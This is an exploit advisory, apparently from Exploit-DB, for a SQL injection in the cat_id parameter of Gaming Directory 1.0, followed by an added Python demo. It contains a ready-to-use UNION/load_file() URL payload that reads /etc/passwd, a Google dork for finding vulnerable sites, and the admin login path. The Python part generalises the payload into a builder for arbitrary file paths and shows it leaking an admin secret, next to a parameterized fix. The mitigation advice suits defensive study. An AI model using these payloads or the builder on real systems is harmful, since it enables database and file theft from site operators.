Vendor: Gaming Directory
By: t0pP8uZz
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Gaming Directory
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:turnkeyzone:gaming_directory
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Year: 2008

Gaming Directory 1.0 SQL Injection Vulnerabilities

This popular gaming directory script builds its MySQL queries from unsanitized request parameters, so a remote attacker can inject SQL through the cat_id parameter of directory.php and read arbitrary data from the database. The injection below is UNION-based: cat_id=-1 makes the original query return no rows, and a UNION ALL SELECT with the same number of columns (four, taken FROM links) appends attacker-chosen values in their place. The third column calls MySQL's load_file() function: since the admin area password is stored in a config file, load_file() can be used to try to locate that file and display its contents. The argument is written as a hex literal so that no quote characters are needed; 0x2F6574632F706173737764 decodes to /etc/passwd, so this payload should load the /etc/passwd file on most Linux distributions. load_file() only returns data when the database user the script connects as holds the FILE privilege and the file is readable by the MySQL server process (and, on newer MySQL builds, is not blocked by secure_file_priv); otherwise it returns NULL. The /**/ sequences stand in for spaces, and the trailing /* comments out the remainder of the original query.

Mitigation:

Use parameterized queries (prepared statements) for every query that carries user-supplied input, and cast numeric parameters such as cat_id to integers before use; validating and filtering input on its own is not a reliable defence against SQL injection. Run the application with a database account that does not hold the FILE privilege, so that load_file() cannot read files from the server even if an injection is found.
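The following is an added example, not code from the Gaming Directory script or from the original advisory. It rebuilds the advisory's UNION/load_file() payload from a file path (so the hex literal and the column layout can be checked), and runs the same UNION technique against an in-memory SQLite stand-in next to the parameterized form that stops it. Everything beyond the advisory's one payload line is an assumption: the column names of links, the admin table, and the exact shape of the vulnerable SQL are constructed for the demo, and because SQLite has no load_file(), the injected column reads a constructed admin password instead of a file.

```python
"""Added example, not the Gaming Directory script's own code.

Assumptions (constructed for this demo): the column names of `links`, the
`admin` table, and the exact shape of the vulnerable SQL. The advisory only
shows that directory.php pastes cat_id into a four-column query over `links`.
SQLite has no load_file(), so the injected column reads from `admin` instead.
"""
import sqlite3

# Payload copied from the advisory; used to check the builder below.
ADVISORY_PAYLOAD = ("-1/**/UNION/**/ALL/**/SELECT/**/1,2,"
                    "load_file(0x2F6574632F706173737764),4/**/FROM/**/links/*")


def hex_literal(text: str) -> str:
    """Encode a string as a MySQL 0x... literal so no quote characters are
    needed (quotes would be escaped by magic_quotes_gpc or addslashes)."""
    return "0x" + text.encode("utf-8").hex().upper()


def decode_hex_literal(literal: str) -> str:
    """Reverse of hex_literal: 0x2F6574632F706173737764 -> /etc/passwd."""
    return bytes.fromhex(literal[2:]).decode("utf-8")


def build_payload(path: str, columns: int = 4, position: int = 3,
                  table: str = "links") -> str:
    """Build the advisory's UNION payload for an arbitrary file path.

    -1 empties the left side of the UNION, /**/ replaces spaces, the column
    at `position` carries load_file(), and the trailing /* discards the rest
    of the original query. Generalising the column count and position goes
    beyond the single line the advisory shows; it only works where the
    guessed count matches the real query.
    """
    cols = [str(i) for i in range(1, columns + 1)]
    cols[position - 1] = f"load_file({hex_literal(path)})"
    return ("-1/**/UNION/**/ALL/**/SELECT/**/" + ",".join(cols)
            + f"/**/FROM/**/{table}/*")


def _demo_db() -> sqlite3.Connection:
    """Constructed schema: a four-column links table plus a secret to leak."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE links (id INTEGER, title TEXT, url TEXT, cat_id INTEGER);
        CREATE TABLE admin (id INTEGER, username TEXT, password TEXT, level INTEGER);
        INSERT INTO links VALUES (1, 'Quake fan site', 'http://example.invalid/q', 6);
        INSERT INTO admin VALUES (1, 'admin', 'constructed-demo-secret', 9);
    """)
    return conn


def list_links_vulnerable(cat_id: str) -> list:
    """Assumed shape of the flaw: cat_id is concatenated straight into SQL."""
    conn = _demo_db()
    sql = ("SELECT id, title, url, cat_id FROM links WHERE cat_id="
           + cat_id + " ORDER BY title")
    return conn.execute(sql).fetchall()


def list_links_hardened(cat_id: str) -> list:
    """Fix: cast to int (rejects the payload) and bind as a parameter."""
    conn = _demo_db()
    sql = "SELECT id, title, url, cat_id FROM links WHERE cat_id=? ORDER BY title"
    return conn.execute(sql, (int(cat_id),)).fetchall()


# Same technique as the advisory payload, with the constructed admin password
# standing in for the file that load_file() would read on MySQL.
UNION_STAND_IN = ("-1/**/UNION/**/ALL/**/SELECT/**/1,2,password,4"
                  "/**/FROM/**/admin/*")


if __name__ == "__main__":
    print(decode_hex_literal("0x2F6574632F706173737764"))
    print(build_payload("/etc/passwd") == ADVISORY_PAYLOAD)
    print(list_links_vulnerable(UNION_STAND_IN))   # admin secret in column 3
    try:
        list_links_hardened(UNION_STAND_IN)
    except ValueError as err:
        print("rejected:", err)
```

The vulnerable function returns the admin secret in the third column of the UNION row, exactly where the advisory places load_file(); the hardened function never reaches the database because int() rejects the payload, and even a numeric-looking value is bound as a parameter rather than spliced into the query text.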

Exploit-DB raw data:

--==+================================================================================+==--
--==+		    Gaming Directory 1.0 SQL Injection Vulnerabilities	           +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 5 April 2008
SITE: http://www.turnkeyzone.com/
Google Dork: inurl:"directory.php?ax=list" gaming


DESCRIPTION: 
This popular gaming directory script is vulnerable due to insecure MySQL queries.
This allows the remote attacker to pull info from the database.

The below injection uses MySQL's load_file function; since the admin area password is stored
in a config file we can use load_file to try and locate it and display the contents of the file.
Certain permissions for the running DB user are required for this to work. In the load_file below
is a string that has been converted to hex and if you can read hex then it's /etc/passwd, so this
should load the /etc/passwd file on most Linux distros. Remember certain permissions are needed.


EXPLOITS:
http://site.com/directory.php?ax=list&sub=6&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(0x2F6574632F706173737764),4/**/FROM/**/links/*


NOTE/TIP: 
admin login is at /siteadmin/


GREETZ: milw0rm.com, H4CK-Y0u.org, CipherCrew!



--==+================================================================================+==--
--==+		    Gaming Directory 1.0 SQL Injection Vulnerabilities	           +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-05]